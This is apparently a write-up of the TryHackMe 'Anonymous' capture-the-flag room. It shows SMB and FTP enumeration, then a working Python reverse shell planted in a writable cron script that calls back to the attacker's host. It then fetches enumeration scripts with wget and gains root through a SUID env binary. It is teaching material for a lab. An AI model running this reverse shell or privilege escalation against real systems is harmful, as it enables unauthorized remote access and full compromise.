Anonymous

Anonymous

https://tryhackme.com/room/anonymous

Room info:

Try to get the two flags!  Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
For more information on Linux, check out https://tryhackme.com/room/zthlinux

Task 1 Pwn

Enumeration

As always start an initial scan with NMAP

nmap -sC -sV $target_ip -oA scan.content

After the scan we get an output like this

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.166.168
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2021-01-07T02:54:10+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-07T02:54:10
|_  start_date: N/A

With this you get the answer to the First, Second and Third question of Task 1

Now take note of the scan, there are some interesting things that NMAP discovered.

The first thing is that FTP allows anonymous login. (This will come in use to us later on)

SSH reveals that the machine is running Ubuntu and SMB has been setup.

Now we reach the fourth question

There's a share on the user's computer.  What's it called?

We can get the share from the SMB ports (139 and 445).

I will show you two ways, one with NMAP and one with enum4linux.

If you did not know, you can run various scripts with NMAP to enhance your scanning and get more information from your target(s).

By default NMAP comes with preinstalled scripts and the flag to use them is

nmap --script=$script --script_arguments (if required)

(You can get more info here https://nmap.org/nsedoc/)

Lets use smb-enum-users, smb-enum-shares, smb-ls

nmap -p 139,445 --script=smb-enum-usrs,smb-enum-shares,smb-ls $target_ip -oA smb-scan.content
---------------------------------------------------------------------------------------------
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.128.142\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (anonymous server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.128.142\[REDACTED]: 
|     Type: STYPE_DISKTREE
|     Comment: My SMB Share Directory for Pics
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\[REDACTED]\[REDACTED]
|     Anonymous access: READ
|     Current user access: READ
|   \\10.10.128.142\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
| smb-enum-users: 
|   ANONYMOUS\[REDACTED] (RID: 1003)
|     Full name:   [REDACTED]
|     Description: 
|_    Flags:       Normal user account
| smb-ls: Volume \\10.10.128.142\[REDACTED]
| SIZE    TIME                 FILENAME
| <DIR>   2020-05-17T11:11:34  .
| <DIR>   2020-05-14T01:59:10  ..
| 42663   2020-05-12T00:43:42  [REDACTED].jpg
| 265188  2020-05-12T00:43:42  [REDACTED].jpeg
|_

As you can see NMAP gives a simple but a somewhat detailed output of the scan.

It shows us which shares are available, the users that have access to those shares and smb-ls displays us the content in the shares that we can access as guest.

The second way to enumerate the SMB ports is with enum4linux. (If you do not have enum4linux you can get it from here https://github.com/CiscoCXSecurity/enum4linux).

Simply run enum4linux -a $target_ip

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.128.142
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.128.142    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 10.10.128.142    |
 ============================================= 
Looking up status of 10.10.128.142
        ANONYMOUS       <00> -         B <ACTIVE>  Workstation Service
        ANONYMOUS       <03> -         B <ACTIVE>  Messenger Service
        ANONYMOUS       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 10.10.128.142    |
 ====================================== 
[+] Server 10.10.128.142 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.128.142    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 10.10.128.142    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.128.142 from smbclient: 
[+] Got OS info for 10.10.128.142 from srvinfo:
        ANONYMOUS      Wk Sv PrQ Unx NT SNT anonymous server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ============================== 
|    Users on 10.10.128.142    |
 ============================== 
index: 0x1 RID: 0x3eb acb: 0x00000010 Account: [REDACTED]      Name: [REDACTED]       Desc: 

user:[[REDACTED]] rid:[0x3eb]

 ========================================== 
|    Share Enumeration on 10.10.128.142    |
 ========================================== 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        [REDACTED]      Disk      My SMB Share Directory for [REDACTED]
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.128.142
//10.10.128.142/print$  Mapping: DENIED, Listing: N/A
//10.10.128.142/[REDACTED]    Mapping: OK, Listing: OK
//10.10.128.142/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 10.10.128.142    |
 ===================================================== 


[+] Attaching to 10.10.128.142 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] ANONYMOUS
        [+] Builtin

[+] Password Info for Domain: ANONYMOUS

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 =============================== 
|    Groups on 10.10.128.142    |
 =============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 10.10.128.142 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2144577014-3591677122-2188425437
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\[REDACTED] (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2144577014-3591677122-2188425437 and logon username '', password ''

S-1-5-21-2144577014-3591677122-2188425437-501 ANONYMOUS\nobody (Local User)

S-1-5-21-2144577014-3591677122-2188425437-513 ANONYMOUS\None (Domain Group)

S-1-5-21-2144577014-3591677122-2188425437-1003 ANONYMOUS\[REDACTED] (Local User)


 ============================================== 
|    Getting printer info for 10.10.128.142    |
 ============================================== 
No printers returned.

For the sake of space, I have removed some useless information from the output and left out only the important bits. Your output will have a lot of more information.

With this you get the answer to the Fourth question of Task 1.

From the info we have gathered we can see that there is a share that we can access as a guest and one user.

To access the share we can use

smbclient '\\$target_ip\$share' (for guest)
smbclient '\\$target_ip\$share' -U (username) -P (password)

smbclient '\\10.10.128.142\[REDACTED]'
Enter WORKGROUP\users's password: (JUST LEAVE IT BLANK)
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 13:11:34 2020
  ..                                  D        0  Thu May 14 03:59:10 2020
  [REDACTED].jpg                          N    42663  Tue May 12 02:43:42 2020
  [REDACTED].jpeg                         N   265188  Tue May 12 02:43:42 2020

                20508240 blocks of size 1024. 13306640 blocks available
smb: \>

Type help to get more information about the commands you can use in smb.

There are two adorable pictures that we can get, however there isn't much information we can get from them with steghide since they require a password.

Now lets get our attention to FTP.

As previously shown from NMAP, we can login to FTP as anonymous (big surprise there x0 )

tp $target
Connected to 10.10.128.142.
220 [REDACTED]'s FTP Server!
Name (10.10.128.142:magic): anonymous
331 Please specify the password.
Password: (LEAVE BLANK)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp>

We can see that there is a scripts directory.

Lets get all the files and go through them. (For more information about FTP type ? in the console or read this https://www.cs.colostate.edu/helpdocs/ftp.html)

We got three files clean.sh removed_files.log to_do.txt

cat to_do.txt 
"I really need to disable the anonymous login...it's really not safe"

cat removed_files.log 
Running cleanup script:  nothing to delete (this repeats like 20 times)

cat clean.sh 
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Looking through them, we see that to_do.txt is just a simple note, however removed_files.log and clean.sh are tied. Examining clean.sh, the script removes all files in the /tmp directory and outputs the logs in /var/ftp/scripts/removed_files.log. Judging by this, clean.sh is probably a cronjob that executes once every few minutes, hours, days, etc. (For more info about cronjobs https://ostechnix.com/a-beginners-guide-to-cron-jobs/)

Reverse Shell

If clean.sh is a cron task, we can use this to get a reverse shell, by simply modifying the file and upload it back to the scripts folder.

Download the file, edit it with your text editor and grab a reverse shell code from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

My recomendations are Bash TCP, Perl and Python, since those are by default in pretty much every Linux Distro.

#!/bin/bash
export RHOST="YOUR-IP";export RPORT=PORT;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script:  nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi

Then upload it and start nc -lvnp $PORT and in about 1 minute you'll get a shell back.

Privilige Escalation

Once you're in, I suggest to always Stabilize your shell.

1. python -c 'import pty;pty.spawn("/bin/bash")'

2. export TERM=xterm

3. ^Z (Ctrl + Z) (to background the reverse shell)

4. stty raw -echo;fg (this will put you back in your reverse shell)

[REDACTED]@anonymous:~$ ls
pics  user.txt
[REDACTED]@anonymous:~$ wc -c user.txt 
33 user.txt

You're dropped in the home directory of the main user in this challenge and can read the user.txt flag.

Now, since there is a script that deletes files in /tmp I'd suggest to go to

Let's get some scripts to enumerate our system.

Here are some suggestions:

• https://github.com/diego-treitos/linux-smart-enumeration

• https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

• https://github.com/rebootuser/LinEnum (I'll be using this)

And worth to check out https://github.com/jondonas/linux-exploit-suggester-2 (this won't be used in this current challenge, but will end up to be useful in other challenges).

Let's upload our files with

python3 -m http.server (on our machine)
wget http://$your_ip:$port/path/to/scripts (on remote target)
chmod +x script.to.use.sh
./execute.script.sh | tee enum.txt

(the last command piping it into tee is good to save the output in a file so that you don't have to rerun the script again if you lose the information, however it is also bad as it leaves traces of your steps).

The output of LinEnum is quite large so I'll just put in the important info that we need.

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 35000 Jan 18  2018 /usr/bin/env

As we can see, /usr/bin/env has a SUID bit set and is owned by root. This means we can use it to our advantage to get a root shell!

On how to execute this, you can search at https://gtfobins.github.io/ and search for env.

Simply run

env /bin/sh -p
or
env /bin/bash -p

[REDACTED]@anonymous:~$ whoami
[REDACTED]
[REDACTED]@anonymous:~$ env /bin/bash -p
bash-4.4# whoami
root

And you get root!

bash-4.4# cd /root
bash-4.4# ls
root.txt
bash-4.4# wc -c root.txt 
33 root.txt
bash-4.4#

Final thoughts

Anonymous is set as a Medium difficulty challenge, however in my oppinion it seems quite easy to finish this challenge.

Just enumerate properly, google search any unknown things and how to exploit them.

A little sidenote, the user is part of the lxd group which means besides the env privesc, we can use lxd to get a root shell too!